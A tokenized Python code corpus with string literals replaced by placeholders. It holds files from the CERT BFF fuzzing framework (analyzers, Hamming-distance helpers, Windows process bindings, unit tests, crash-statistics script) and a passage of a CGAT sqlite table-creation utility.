<s> import os <EOL> import os . path <EOL> import sys <EOL> xdg = os . getenv ( '<STR_LIT>' ) or os . path . join ( os . getenv ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> conffile = os . path . join ( xdg , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if not os . access ( conffile , os . R_OK ) : <EOL> conffile = os . path . join ( '<STR_LIT:/>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if not os . access ( conffile , os . R_OK ) : <EOL> print >> sys . stderr , '<STR_LIT>' '<STR_LIT>' % conffile <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> execfile ( conffile ) </s>
<s> from bottle_rest import * </s>
<s> """<STR_LIT>""" <EOL> from app import db <EOL> db . create_all ( ) </s>
<s> '''<STR_LIT>''' <EOL> import logging <EOL> from . . import Analyzer <EOL> logger = logging . getLogger ( __name__ ) <EOL> logger . setLevel ( logging . DEBUG ) <EOL> OUTFILE_EXT = "<STR_LIT>" <EOL> get_file = lambda x : '<STR_LIT>' % ( x , OUTFILE_EXT ) <EOL> class Callgrind ( Analyzer ) : <EOL> def __init__ ( self , cfg , crash ) : <EOL> outfile = get_file ( crash . fuzzedfile . path ) <EOL> timeout = cfg . valgrindtimeout <EOL> super ( Callgrind , self ) . __init__ ( cfg , crash , outfile , timeout ) <EOL> self . empty_output_ok = True <EOL> self . missing_output_ok = True <EOL> def _get_cmdline ( self ) : <EOL> args = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' % self . outfile ] <EOL> args . extend ( self . cmdargs ) <EOL> return args </s>
<s> '''<STR_LIT>''' <EOL> import logging <EOL> import argparse <EOL> from . . api . aapt import Aapt <EOL> from . . api . android_manifest import AndroidManifest <EOL> import os <EOL> def main ( ) : <EOL> logger = logging . getLogger ( ) <EOL> hdlr = logging . StreamHandler ( ) <EOL> logger . addHandler ( hdlr ) <EOL> parser = argparse . ArgumentParser ( ) <EOL> group = parser . add_mutually_exclusive_group ( ) <EOL> group . add_argument ( '<STR_LIT>' , help = '<STR_LIT>' , action = '<STR_LIT:store_true>' ) <EOL> group . add_argument ( '<STR_LIT>' , '<STR_LIT>' , help = '<STR_LIT>' , action = '<STR_LIT:store_true>' ) <EOL> parser . add_argument ( '<STR_LIT>' , <EOL> help = '<STR_LIT>' , <EOL> type = str ) <EOL> args = parser . parse_args ( ) <EOL> if args . debug : <EOL> logger . setLevel ( logging . DEBUG ) <EOL> elif args . verbose : <EOL> logger . setLevel ( logging . INFO ) <EOL> else : <EOL> logger . setLevel ( logging . WARNING ) <EOL> aapt = Aapt ( ) <EOL> aapt . get_manifest ( os . path . expanduser ( args . apk ) ) <EOL> manifest_text = aapt . stdout <EOL> manifest = AndroidManifest ( manifest_text ) <EOL> vstr = '<STR_LIT>' . format ( os . path . basename ( args . apk ) , manifest . version_info ) <EOL> print '<STR_LIT:#>' * ( len ( vstr ) + <NUM_LIT:4> ) <EOL> print '<STR_LIT>' . format ( vstr ) <EOL> print '<STR_LIT:#>' * ( len ( vstr ) + <NUM_LIT:4> ) <EOL> print <EOL> for mimetype in manifest . mimetypes : <EOL> print mimetype <EOL> print <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> from errors import DbError </s>
<s> from . basicfile import BasicFile <EOL> from . fuzzedfile import FuzzedFile <EOL> from . seedfile import SeedFile <EOL> from . errors import FileHandlerError , BasicFileError , FuzzedFileError <EOL> from . errors import SeedFileError </s>
<s> '''<STR_LIT>''' <EOL> import itertools <EOL> import os <EOL> def vector_compare ( v1 , v2 ) : <EOL> '''<STR_LIT>''' <EOL> vdict = { } <EOL> for v in v1 , v2 : <EOL> for idx in v : <EOL> if vdict . get ( idx ) : <EOL> vdict [ idx ] += <NUM_LIT:1> <EOL> else : <EOL> vdict [ idx ] = <NUM_LIT:1> <EOL> distance = <NUM_LIT:0> <EOL> for val in vdict . values ( ) : <EOL> if val == <NUM_LIT:1> : <EOL> distance += <NUM_LIT:1> <EOL> return distance <EOL> def bytemap ( s1 , s2 ) : <EOL> '''<STR_LIT>''' <EOL> assert len ( s1 ) == len ( s2 ) <EOL> delta = [ ] <EOL> for idx , ( c1 , c2 ) in enumerate ( itertools . izip ( s1 , s2 ) ) : <EOL> if c1 != c2 : <EOL> delta . append ( idx ) <EOL> return delta <EOL> def bytewise_hd ( s1 , s2 ) : <EOL> '''<STR_LIT>''' <EOL> assert len ( s1 ) == len ( s2 ) <EOL> return sum ( ch1 != ch2 for ch1 , ch2 in itertools . izip ( s1 , s2 ) ) <EOL> def bytewise_hamming_distance ( file1 , file2 ) : <EOL> '''<STR_LIT>''' <EOL> return _file_compare ( bytewise_hd , file1 , file2 ) <EOL> def _file_compare ( distance_function , file1 , file2 ) : <EOL> assert os . path . getsize ( file1 ) == os . path . getsize ( file2 ) <EOL> distance = <NUM_LIT:0> <EOL> with open ( file1 , '<STR_LIT:rb>' ) as f1 : <EOL> with open ( file2 , '<STR_LIT:rb>' ) as f2 : <EOL> distance = distance_function ( f1 . read ( ) , f2 . read ( ) ) <EOL> return distance <EOL> def bitwise_hd ( x , y ) : <EOL> '''<STR_LIT>''' <EOL> assert len ( x ) == len ( y ) <EOL> hd = <NUM_LIT:0> <EOL> for ( a , b ) in itertools . izip ( x , y ) : <EOL> a = ord ( a ) <EOL> b = ord ( b ) <EOL> v = a ^ b <EOL> while v : <EOL> v = v & ( v - <NUM_LIT:1> ) <EOL> hd += <NUM_LIT:1> <EOL> return hd <EOL> def bitwise_hamming_distance ( file1 , file2 ) : <EOL> '''<STR_LIT>''' <EOL> return _file_compare ( bitwise_hd , file1 , file2 ) </s>
<s> from ctypes import c_void_p , POINTER , sizeof , Structure , windll , WinError , WINFUNCTYPE <EOL> from ctypes . wintypes import BOOL , BYTE , DWORD , HANDLE , LPCWSTR , LPWSTR , UINT , WORD <EOL> LPVOID = c_void_p <EOL> LPBYTE = POINTER ( BYTE ) <EOL> LPDWORD = POINTER ( DWORD ) <EOL> def ErrCheckBool ( result , func , args ) : <EOL> """<STR_LIT>""" <EOL> if not result : <EOL> raise WinError ( ) <EOL> return args <EOL> CloseHandleProto = WINFUNCTYPE ( BOOL , HANDLE ) <EOL> CloseHandle = CloseHandleProto ( ( "<STR_LIT>" , windll . kernel32 ) ) <EOL> CloseHandle . errcheck = ErrCheckBool <EOL> class AutoHANDLE ( HANDLE ) : <EOL> """<STR_LIT>""" <EOL> def Close ( self ) : <EOL> if self . value : <EOL> CloseHandle ( self ) <EOL> self . value = <NUM_LIT:0> <EOL> def __del__ ( self ) : <EOL> self . Close ( ) <EOL> def __int__ ( self ) : <EOL> return self . value <EOL> def ErrCheckHandle ( result , func , args ) : <EOL> """<STR_LIT>""" <EOL> if not result : <EOL> raise WinError ( ) <EOL> return AutoHANDLE ( result ) <EOL> class PROCESS_INFORMATION ( Structure ) : <EOL> _fields_ = [ ( "<STR_LIT>" , HANDLE ) , <EOL> ( "<STR_LIT>" , HANDLE ) , <EOL> ( "<STR_LIT>" , DWORD ) , <EOL> ( "<STR_LIT>" , DWORD ) ] <EOL> def __init__ ( self ) : <EOL> Structure . __init__ ( self ) <EOL> self . cb = sizeof ( self ) <EOL> LPPROCESS_INFORMATION = POINTER ( PROCESS_INFORMATION ) <EOL> class STARTUPINFO ( Structure ) : <EOL> _fields_ = [ ( "<STR_LIT>" , DWORD ) , <EOL> ( "<STR_LIT>" , LPWSTR ) , <EOL> ( "<STR_LIT>" , LPWSTR ) , <EOL> ( "<STR_LIT>" , LPWSTR ) , <EOL> ( "<STR_LIT>" , DWORD ) , <EOL> ( "<STR_LIT>" , DWORD ) , <EOL> ( "<STR_LIT>" , DWORD ) , <EOL> ( "<STR_LIT>" , DWORD ) , <EOL> ( "<STR_LIT>" , DWORD ) , <EOL> ( "<STR_LIT>" , DWORD ) , <EOL> ( "<STR_LIT>" , DWORD ) , <EOL> ( "<STR_LIT>" , DWORD ) , <EOL> ( "<STR_LIT>" , WORD ) , <EOL> ( "<STR_LIT>" , WORD ) , <EOL> ( "<STR_LIT>" , LPBYTE ) , <EOL> ( "<STR_LIT>" , HANDLE ) , <EOL> ( "<STR_LIT>" , HANDLE ) , <EOL> ( "<STR_LIT>" , HANDLE ) <EOL> ] <EOL> LPSTARTUPINFO = POINTER ( STARTUPINFO ) <EOL> STARTF_USESHOWWINDOW = <NUM_LIT> <EOL> STARTF_USESIZE = <NUM_LIT> <EOL> STARTF_USEPOSITION = <NUM_LIT> <EOL> STARTF_USECOUNTCHARS = <NUM_LIT> <EOL> STARTF_USEFILLATTRIBUTE = <NUM_LIT> <EOL> STARTF_RUNFULLSCREEN = <NUM_LIT> <EOL> STARTF_FORCEONFEEDBACK = <NUM_LIT> <EOL> STARTF_FORCEOFFFEEDBACK = <NUM_LIT> <EOL> STARTF_USESTDHANDLES = <NUM_LIT> <EOL> class EnvironmentBlock : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , dict ) : <EOL> if not dict : <EOL> self . _as_parameter_ = None <EOL> else : <EOL> values = [ "<STR_LIT>" % ( key , value ) <EOL> for ( key , value ) in dict . iteritems ( ) ] <EOL> values . append ( "<STR_LIT>" ) <EOL> self . _as_parameter_ = LPCWSTR ( "<STR_LIT>" . join ( values ) ) <EOL> CreateProcessProto = WINFUNCTYPE ( BOOL , <EOL> LPCWSTR , <EOL> LPWSTR , <EOL> LPVOID , <EOL> LPVOID , <EOL> BOOL , <EOL> DWORD , <EOL> LPVOID , <EOL> LPCWSTR , <EOL> LPSTARTUPINFO , <EOL> LPPROCESS_INFORMATION <EOL> ) <EOL> CreateProcessFlags = ( ( <NUM_LIT:1> , "<STR_LIT>" , None ) , <EOL> ( <NUM_LIT:1> , "<STR_LIT>" ) , <EOL> ( <NUM_LIT:1> , "<STR_LIT>" , None ) , <EOL> ( <NUM_LIT:1> , "<STR_LIT>" , None ) , <EOL> ( <NUM_LIT:1> , "<STR_LIT>" , True ) , <EOL> ( <NUM_LIT:1> , "<STR_LIT>" , <NUM_LIT:0> ) , <EOL> ( <NUM_LIT:1> , "<STR_LIT>" , None ) , <EOL> ( <NUM_LIT:1> , "<STR_LIT>" , None ) , <EOL> ( <NUM_LIT:1> , "<STR_LIT>" ) , <EOL> ( <NUM_LIT:2> , "<STR_LIT>" ) ) <EOL> def ErrCheckCreateProcess ( result , func , args ) : <EOL> ErrCheckBool ( result , func , args ) <EOL> pi = args [ <NUM_LIT:9> ] <EOL> return AutoHANDLE ( pi . hProcess ) , AutoHANDLE ( pi . hThread ) , pi . dwProcessID , pi . dwThreadID <EOL> CreateProcess = CreateProcessProto ( ( "<STR_LIT>" , windll . kernel32 ) , <EOL> CreateProcessFlags ) <EOL> CreateProcess . errcheck = ErrCheckCreateProcess <EOL> CREATE_BREAKAWAY_FROM_JOB = <NUM_LIT> <EOL> CREATE_DEFAULT_ERROR_MODE = <NUM_LIT> <EOL> CREATE_NEW_CONSOLE = <NUM_LIT> <EOL> CREATE_NEW_PROCESS_GROUP = <NUM_LIT> <EOL> CREATE_NO_WINDOW = <NUM_LIT> <EOL> CREATE_SUSPENDED = <NUM_LIT> <EOL> CREATE_UNICODE_ENVIRONMENT = <NUM_LIT> <EOL> DEBUG_ONLY_THIS_PROCESS = <NUM_LIT> <EOL> DEBUG_PROCESS = <NUM_LIT> <EOL> DETACHED_PROCESS = <NUM_LIT> <EOL> CreateJobObjectProto = WINFUNCTYPE ( HANDLE , <EOL> LPVOID , <EOL> LPCWSTR <EOL> ) <EOL> CreateJobObjectFlags = ( ( <NUM_LIT:1> , "<STR_LIT>" , None ) , <EOL> ( <NUM_LIT:1> , "<STR_LIT>" , LPCWSTR ( "<STR_LIT>" ) ) ) <EOL> CreateJobObject = CreateJobObjectProto ( ( "<STR_LIT>" , windll . kernel32 ) , <EOL> CreateJobObjectFlags ) <EOL> CreateJobObject . errcheck = ErrCheckHandle <EOL> AssignProcessToJobObjectProto = WINFUNCTYPE ( BOOL , <EOL> HANDLE , <EOL> HANDLE <EOL> ) <EOL> AssignProcessToJobObjectFlags = ( ( <NUM_LIT:1> , "<STR_LIT>" ) , <EOL> ( <NUM_LIT:1> , "<STR_LIT>" ) ) <EOL> AssignProcessToJobObject = AssignProcessToJobObjectProto ( <EOL> ( "<STR_LIT>" , windll . kernel32 ) , <EOL> AssignProcessToJobObjectFlags ) <EOL> AssignProcessToJobObject . errcheck = ErrCheckBool <EOL> def ErrCheckResumeThread ( result , func , args ) : <EOL> if result == - <NUM_LIT:1> : <EOL> raise WinError ( ) <EOL> return args <EOL> ResumeThreadProto = WINFUNCTYPE ( DWORD , <EOL> HANDLE <EOL> ) <EOL> ResumeThreadFlags = ( ( <NUM_LIT:1> , "<STR_LIT>" ) , ) <EOL> ResumeThread = ResumeThreadProto ( ( "<STR_LIT>" , windll . kernel32 ) , <EOL> ResumeThreadFlags ) <EOL> ResumeThread . errcheck = ErrCheckResumeThread <EOL> TerminateProcessProto = WINFUNCTYPE ( BOOL , <EOL> HANDLE , <EOL> UINT <EOL> ) <EOL> TerminateProcessFlags = ( ( <NUM_LIT:1> , "<STR_LIT>" ) , <EOL> ( <NUM_LIT:1> , "<STR_LIT>" , <NUM_LIT> ) ) <EOL> TerminateProcess = TerminateProcessProto ( <EOL> ( "<STR_LIT>" , windll . kernel32 ) , <EOL> TerminateProcessFlags ) <EOL> TerminateProcess . errcheck = ErrCheckBool <EOL> TerminateJobObjectProto = WINFUNCTYPE ( BOOL , <EOL> HANDLE , <EOL> UINT <EOL> ) <EOL> TerminateJobObjectFlags = ( ( <NUM_LIT:1> , "<STR_LIT>" ) , <EOL> ( <NUM_LIT:1> , "<STR_LIT>" , <NUM_LIT> ) ) <EOL> TerminateJobObject = TerminateJobObjectProto ( <EOL> ( "<STR_LIT>" , windll . kernel32 ) , <EOL> TerminateJobObjectFlags ) <EOL> TerminateJobObject . errcheck = ErrCheckBool <EOL> WaitForSingleObjectProto = WINFUNCTYPE ( DWORD , <EOL> HANDLE , <EOL> DWORD , <EOL> ) <EOL> WaitForSingleObjectFlags = ( ( <NUM_LIT:1> , "<STR_LIT>" ) , <EOL> ( <NUM_LIT:1> , "<STR_LIT>" , - <NUM_LIT:1> ) ) <EOL> WaitForSingleObject = WaitForSingleObjectProto ( <EOL> ( "<STR_LIT>" , windll . kernel32 ) , <EOL> WaitForSingleObjectFlags ) <EOL> INFINITE = - <NUM_LIT:1> <EOL> WAIT_TIMEOUT = <NUM_LIT> <EOL> WAIT_OBJECT_0 = <NUM_LIT> <EOL> WAIT_ABANDONED = <NUM_LIT> <EOL> GetExitCodeProcessProto = WINFUNCTYPE ( BOOL , <EOL> HANDLE , <EOL> LPDWORD , <EOL> ) <EOL> GetExitCodeProcessFlags = ( ( <NUM_LIT:1> , "<STR_LIT>" ) , <EOL> ( <NUM_LIT:2> , "<STR_LIT>" ) ) <EOL> GetExitCodeProcess = GetExitCodeProcessProto ( <EOL> ( "<STR_LIT>" , windll . kernel32 ) , <EOL> GetExitCodeProcessFlags ) <EOL> GetExitCodeProcess . errcheck = ErrCheckBool </s>
<s> '''<STR_LIT>''' <EOL> import unittest <EOL> class Test ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> pass <EOL> def tearDown ( self ) : <EOL> pass <EOL> def testName ( self ) : <EOL> pass <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> '''<STR_LIT>''' <EOL> import unittest <EOL> from certfuzz . test import misc <EOL> import certfuzz . crash <EOL> class Test ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> pass <EOL> def tearDown ( self ) : <EOL> pass <EOL> def test_api ( self ) : <EOL> module = certfuzz . crash <EOL> api_list = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> ( is_fail , msg ) = misc . check_for_apis ( module , api_list ) <EOL> self . assertFalse ( is_fail , msg ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> '''<STR_LIT>''' <EOL> import unittest <EOL> import os <EOL> import shutil <EOL> from certfuzz . fuzzers . nullmut import NullMutFuzzer <EOL> from certfuzz . test import MockSeedfile , MockRange <EOL> import tempfile <EOL> from certfuzz . fuzztools . hamming import bytewise_hd <EOL> class Test ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . sf = seedfile_obj = MockSeedfile ( ) <EOL> self . sf . value = bytearray ( self . sf . value ) <EOL> self . nulls_inserted = <NUM_LIT:0> <EOL> for i in xrange ( <NUM_LIT:0> , len ( self . sf . value ) , <NUM_LIT:10> ) : <EOL> self . sf . value [ i ] = <NUM_LIT> <EOL> self . nulls_inserted += <NUM_LIT:1> <EOL> self . tempdir = tempfile . mkdtemp ( ) <EOL> self . outdir = outdir_base = tempfile . mkdtemp ( prefix = '<STR_LIT>' , <EOL> dir = self . tempdir ) <EOL> rng_seed = <NUM_LIT:0> <EOL> iteration = <NUM_LIT:0> <EOL> self . options = { '<STR_LIT>' : <NUM_LIT:0.1> , '<STR_LIT>' : <NUM_LIT> } <EOL> self . args = ( seedfile_obj , outdir_base , rng_seed , iteration , self . options ) <EOL> def tearDown ( self ) : <EOL> shutil . rmtree ( self . tempdir ) <EOL> def test_is_minimizable ( self ) : <EOL> f = NullMutFuzzer ( * self . args ) <EOL> self . assertTrue ( f . is_minimizable ) <EOL> def test_fuzzable_chars ( self ) : <EOL> f = NullMutFuzzer ( * self . args ) <EOL> self . assertTrue ( <NUM_LIT> in f . fuzzable_chars ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> '''<STR_LIT>''' <EOL> import unittest <EOL> from certfuzz . scoring . multiarmed_bandit . arms import errors <EOL> class Test ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> pass <EOL> def tearDown ( self ) : <EOL> pass <EOL> def testName ( self ) : <EOL> pass <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> '''<STR_LIT>''' <EOL> import os <EOL> import logging <EOL> import sys <EOL> import re <EOL> from optparse import OptionParser <EOL> parent_path = os . path . abspath ( os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT:..>' ) ) <EOL> sys . path . insert ( <NUM_LIT:0> , parent_path ) <EOL> from certfuzz . campaign . config . bff_config import read_config_options <EOL> logger = logging . getLogger ( __name__ ) <EOL> logger . setLevel ( logging . INFO ) <EOL> hdlr = logging . StreamHandler ( sys . stdout ) <EOL> logger . addHandler ( hdlr ) <EOL> def _fmt_ln ( formats , parts ) : <EOL> return '<STR_LIT:\t>' . join ( fmt % val for ( fmt , val ) in zip ( formats , parts ) ) <EOL> def format_header ( parts ) : <EOL> formats = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> return '<STR_LIT:#>' + _fmt_ln ( formats , parts ) <EOL> def format_line ( parts ) : <EOL> formats = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> return _fmt_ln ( formats , parts ) <EOL> def record_stats ( key , seed_list , counters , first_seeds , last_seeds ) : <EOL> uniq_seeds = list ( set ( seed_list ) ) <EOL> logger . debug ( '<STR_LIT>' , uniq_seeds ) <EOL> first_seeds [ key ] = min ( uniq_seeds ) <EOL> last_seeds [ key ] = max ( uniq_seeds ) <EOL> counters [ key ] = len ( uniq_seeds ) <EOL> logger . debug ( '<STR_LIT>' , key , first_seeds [ key ] , last_seeds [ key ] , counters [ key ] ) <EOL> def get_sort_key ( options , counters , bit_hds , byte_hds , first_seeds , last_seeds ) : <EOL> if options . sort_by_first : <EOL> sort_by = first_seeds <EOL> reverse = False <EOL> elif options . sort_by_last : <EOL> sort_by = last_seeds <EOL> reverse = False <EOL> elif options . sort_by_bits : <EOL> sort_by = bit_hds <EOL> reverse = False <EOL> elif options . sort_by_bytes : <EOL> sort_by = byte_hds <EOL> reverse = False <EOL> else : <EOL> sort_by = counters <EOL> reverse = True <EOL> return sort_by , reverse <EOL> def prepare_output ( options , counters , bit_hds , byte_hds , first_seeds , last_seeds ) : <EOL> output_lines = [ ] <EOL> header_line = format_header ( ( '<STR_LIT>' , '<STR_LIT:count>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> output_lines . append ( header_line ) <EOL> sort_by , reverse = get_sort_key ( options , counters , bit_hds , byte_hds , first_seeds , last_seeds ) <EOL> for dummy , k in sorted ( [ ( value , key ) for ( key , value ) in sort_by . items ( ) ] , reverse = reverse ) : <EOL> parts = [ k , counters [ k ] , first_seeds [ k ] , last_seeds [ k ] , bit_hds [ k ] , byte_hds [ k ] ] <EOL> output_lines . append ( format_line ( parts ) ) <EOL> return output_lines <EOL> def parse_cmdline_args ( ) : <EOL> parser = OptionParser ( ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , help = "<STR_LIT>" , action = '<STR_LIT:store_true>' , default = False ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , help = "<STR_LIT>" ) <EOL> parser . add_option ( '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , help = "<STR_LIT>" , action = '<STR_LIT:store_true>' , default = False ) <EOL> parser . add_option ( '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , help = "<STR_LIT>" , action = '<STR_LIT:store_true>' , default = False ) <EOL> parser . add_option ( '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , help = "<STR_LIT>" , action = '<STR_LIT:store_true>' , default = False ) <EOL> parser . add_option ( '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , help = "<STR_LIT>" , action = '<STR_LIT:store_true>' , default = False ) <EOL> options , dummy = parser . parse_args ( ) <EOL> return options <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> options = parse_cmdline_args ( ) <EOL> if options . debug : <EOL> logger . setLevel ( logging . DEBUG ) <EOL> if options . cfgfile : <EOL> cfg_file = options . cfgfile <EOL> else : <EOL> cfg_file = os . path . join ( parent_path , '<STR_LIT>' , '<STR_LIT>' ) <EOL> logger . debug ( '<STR_LIT>' , cfg_file ) <EOL> cfg = read_config_options ( cfg_file ) <EOL> result_dir = cfg . crashers_dir <EOL> logger . debug ( '<STR_LIT>' , result_dir ) <EOL> counters = { } <EOL> bit_hds = { } <EOL> byte_hds = { } <EOL> first_seeds = { } <EOL> last_seeds = { } <EOL> if not os . path . isdir ( result_dir ) : <EOL> logger . info ( '<STR_LIT>' , result_dir ) <EOL> sys . exit ( ) <EOL> for x in os . listdir ( result_dir ) : <EOL> fullpath = os . path . join ( result_dir , x ) <EOL> if not os . path . isdir ( fullpath ) : <EOL> logger . debug ( '<STR_LIT>' , fullpath ) <EOL> continue <EOL> logger . debug ( '<STR_LIT>' , fullpath ) <EOL> crashlog = '<STR_LIT>' % x <EOL> fullpath_crashlog = os . path . join ( fullpath , crashlog ) <EOL> if not os . path . isfile ( fullpath_crashlog ) : <EOL> logger . debug ( '<STR_LIT>' , fullpath_crashlog ) <EOL> continue <EOL> logger . debug ( '<STR_LIT>' , fullpath_crashlog ) <EOL> seed_list = [ ] <EOL> f = open ( fullpath_crashlog , '<STR_LIT:r>' ) <EOL> try : <EOL> for l in f . readlines ( ) : <EOL> m = re . search ( '<STR_LIT>' , l ) <EOL> if m : <EOL> seed_list . append ( int ( m . group ( <NUM_LIT:1> ) ) ) <EOL> logger . debug ( '<STR_LIT>' , x , m . group ( <NUM_LIT:1> ) ) <EOL> continue <EOL> m = re . match ( '<STR_LIT>' , l ) <EOL> if m : <EOL> bit_hds [ x ] = int ( m . group ( <NUM_LIT:1> ) ) <EOL> logger . debug ( '<STR_LIT>' , x , m . group ( <NUM_LIT:1> ) ) <EOL> continue <EOL> m = re . match ( '<STR_LIT>' , l ) <EOL> if m : <EOL> byte_hds [ x ] = int ( m . group ( <NUM_LIT:1> ) ) <EOL> logger . debug ( '<STR_LIT>' , x , m . group ( <NUM_LIT:1> ) ) <EOL> continue <EOL> finally : <EOL> f . close ( ) <EOL> if len ( seed_list ) == <NUM_LIT:0> : <EOL> logger . debug ( '<STR_LIT>' , x ) <EOL> continue <EOL> record_stats ( x , seed_list , counters , first_seeds , last_seeds ) <EOL> output_lines = prepare_output ( options , counters , bit_hds , byte_hds , first_seeds , last_seeds ) <EOL> [ logger . info ( l ) for l in output_lines ] </s>
<s> '''<STR_LIT>''' <EOL> import os <EOL> import string <EOL> import re <EOL> import time <EOL> import tempfile <EOL> import types <EOL> from CGAT import Experiment as E <EOL> from CGAT import CSV as CSV <EOL> from CGAT import IOTools as IOTools <EOL> import sqlite3 <EOL> def executewait ( dbhandle , statement , error , <EOL> retry = False , <EOL> wait = <NUM_LIT:5> , <EOL> args = ( ) ) : <EOL> '''<STR_LIT>''' <EOL> cc = dbhandle . cursor ( ) <EOL> i = <NUM_LIT:20> <EOL> while i > <NUM_LIT:0> : <EOL> try : <EOL> cc . execute ( statement , args ) <EOL> return cc <EOL> except sqlite3 . OperationalError as e : <EOL> msg = e . message <EOL> E . warn ( "<STR_LIT>" % <EOL> ( msg , statement ) ) <EOL> if not retry : <EOL> raise e <EOL> if not re . search ( "<STR_LIT>" , str ( msg ) ) : <EOL> raise e <EOL> time . sleep ( wait ) <EOL> i -= <NUM_LIT:1> <EOL> continue <EOL> break <EOL> raise sqlite3 . OperationalError ( "<STR_LIT>" ) <EOL> def quoteRow ( row , take , <EOL> map_column2type , <EOL> missing_values , <EOL> null = "<STR_LIT>" , <EOL> string_value = "<STR_LIT:%s>" ) : <EOL> """<STR_LIT>""" <EOL> d = { } <EOL> for t in take : <EOL> v = row [ t ] <EOL> if v == "<STR_LIT>" : <EOL> d [ t ] = null <EOL> elif v in missing_values : <EOL> d [ t ] = null <EOL> elif map_column2type [ t ] in ( types . IntType , types . FloatType ) : <EOL> d [ t ] = str ( row [ t ] ) <EOL> else : <EOL> d [ t ] = string_value % row [ t ] <EOL> return d <EOL> def quoteTableName ( name , quote_char = "<STR_LIT:_>" , backend = "<STR_LIT>" ) : <EOL> if backend == "<STR_LIT>" : <EOL> if name [ <NUM_LIT:0> ] in "<STR_LIT>" : <EOL> name = "<STR_LIT:_>" + name <EOL> return re . sub ( "<STR_LIT>" , "<STR_LIT:_>" , name ) <EOL> elif backend in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> if name [ <NUM_LIT:0> ] in "<STR_LIT>" : <EOL> name = "<STR_LIT:_>" + name <EOL> return re . sub ( "<STR_LIT>" , "<STR_LIT:_>" , name ) <EOL> def createTable ( dbhandle , <EOL> error , <EOL> tablename , <EOL> options , <EOL> retry = True , <EOL> ignore_empty = True , <EOL> ignore_columns = [ ] , <EOL> rename_columns = [ ] , <EOL> lowercase = False , <EOL> ignore_duplicates = True , <EOL> indices = [ ] , <EOL> rows = None , <EOL> headers = None , <EOL> first_column = None , <EOL> existing_tables = set ( ) , <EOL> append = False ) : <EOL> if rows : <EOL> map_column2type , ignored , max_values = CSV . getMapColumn2Type ( <EOL> rows , <EOL> ignore_empty = ignore_empty , <EOL> get_max_values = True ) <EOL> if ignored : <EOL> E . info ( "<STR_LIT>" % str ( ignored ) ) <EOL> headers = map_column2type . keys ( ) <EOL> headers . sort ( ) <EOL> elif headers : <EOL> map_column2type = dict ( zip ( headers , [ None , ] * len ( headers ) ) ) <EOL> ignored = <NUM_LIT:0> <EOL> columns_to_ignore = set ( [ x . lower ( ) for x in ignore_columns ] ) <EOL> columns_to_rename = dict ( [ x . lower ( ) . split ( "<STR_LIT::>" ) <EOL> for x in rename_columns ] ) <EOL> take = [ ] <EOL> columns = [ ] <EOL> present = { } <EOL> for header_index , h in enumerate ( headers ) : <EOL> hh = h <EOL> if lowercase : <EOL> hh = string . lower ( h ) <EOL> if hh in columns_to_ignore : <EOL> continue <EOL> if hh in present : <EOL> if ignore_duplicates : <EOL> continue <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % hh ) <EOL> present [ hh ] = <NUM_LIT:1> <EOL> take . append ( h ) <EOL> if map_column2type [ h ] == int : <EOL> max_value = max_values [ h ] <EOL> if max_value > <NUM_LIT> : <EOL> t = "<STR_LIT>" <EOL> elif max_value > <NUM_LIT> : <EOL> t = "<STR_LIT>" <EOL> else : <EOL> t = "<STR_LIT>" <EOL> elif map_column2type [ h ] == float : <EOL> t = "<STR_LIT>" <EOL> else : <EOL> if h in options . indices : <EOL> t = options . index <EOL> else : <EOL> t = options . text <EOL> if hh == "<STR_LIT>" : <EOL> if first_column is not None and header_index == <NUM_LIT:0> : <EOL> hh = first_column <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % h ) <EOL> hh = columns_to_rename . get ( hh , hh ) <EOL> hh = re . sub ( '''<STR_LIT>''' , "<STR_LIT>" , hh ) <EOL> hh = re . sub ( "<STR_LIT>" , "<STR_LIT:_>" , hh ) <EOL> if hh [ <NUM_LIT:0> ] in "<STR_LIT>" : <EOL> hh = "<STR_LIT:_>" + hh <EOL> columns . append ( "<STR_LIT>" % ( hh , t ) ) <EOL> if not options . append : <EOL> while <NUM_LIT:1> : <EOL> try : <EOL> cc = dbhandle . cursor ( ) <EOL> statement = "<STR_LIT>" % tablename <EOL> E . debug ( statement ) <EOL> cc . execute ( statement ) <EOL> dbhandle . commit ( ) <EOL> cc . close ( ) <EOL> E . info ( "<STR_LIT>" % tablename ) <EOL> except sqlite3 . OperationalError , msg : <EOL> E . warn ( msg ) <EOL> time . sleep ( 